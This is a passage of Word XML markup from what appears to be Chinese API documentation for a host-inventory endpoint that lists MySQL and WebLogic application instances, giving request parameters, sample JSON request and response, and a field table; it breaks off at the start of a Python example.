          <w:p w14:paraId="688A46BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="363F5311" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0034091B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="674E0F99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38B942AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1DB8A19F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36628ED0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E0DA105" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BE72663" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72EF5875" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F1D1BC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>authToken</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ABF013A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C9ECB6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>授权token，由前端传入，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35397D90" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63217983" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163F7DEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CCE665B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1：linux； 2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F1E5EA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7992C23E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>appName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E32C8ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D52DE13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用名,范围:MySQL,WebLogic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B22587A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA92D7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "authToken": "1da285b0062c4b0ca56f24dfce25b7f8",  //授权token，由前端传入，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "osType": 1,  //1：linux； 2：windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "appName": "MySQL"  //应用名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18430734" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7813DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id" : "5a18eaab3171a748ec593838",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmKind" : 1,    //范围类型，1：主机维度；2：业务组；0：全部主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "group" : null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groupName" : null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentId" : "76dc78d64e7b379a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "appName" : "MySQL",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "userName" : "admin",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "port" : 3306,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "internalIp" : "172.16.6.113",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "displayIp" : "172.16.6.113",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "connectionIp" : null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "externalIp" : null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostTagList":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id" : "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"comId" : "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagName" : "", //标签名</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagColor" : "",  //标签颜色</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagDesc" :"" ,  //标签描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"osType" : 1,  //操作系统</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"createTime" : "2017-03-01",  //创建时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"hostCount" : 0,  //主机数量</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"agentIds" : [] //id列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname": "localhost.localdomain"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E9AB7"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362"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="4694"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4D2E3FE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2A2365F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="640CB6D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56CE8E19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C08A123" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0257680E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E3F8559" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15EBA43E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ObjectId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60FB713C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="421A818C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE8BCCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="349F5E8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围类型，1：主机维度；2：业务组；0：全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35EBE996" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2933EA1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47A8E972" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="361099E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12B88B2B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366CF6B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D416815" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21429771" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="762D3837" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CBF9E2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E240EF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="785F2C23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2BCA665D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD29FC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E484A45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0655FCA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33FA3693" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EC5D382" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>userName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="564FCDE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E9B3983" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D5716E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="210C7308" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75A5B446" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7101CE5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C140DDC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4116C0FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F66362" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="274F664B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6EADA344" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="186476C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectinIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="612CAF0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A44062D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="342861EF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="165D6D61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1939D784" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B0D9C0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06229AD4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C41E50B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56FC9AF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D1792E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7DB3DFE9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="789A6492" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56111FA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69F88284" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5F50FB8F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78A1E54D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E6BE52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="302039AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="423F808E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40CF7DC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73184906" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05B66B50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19338CAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A86817" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
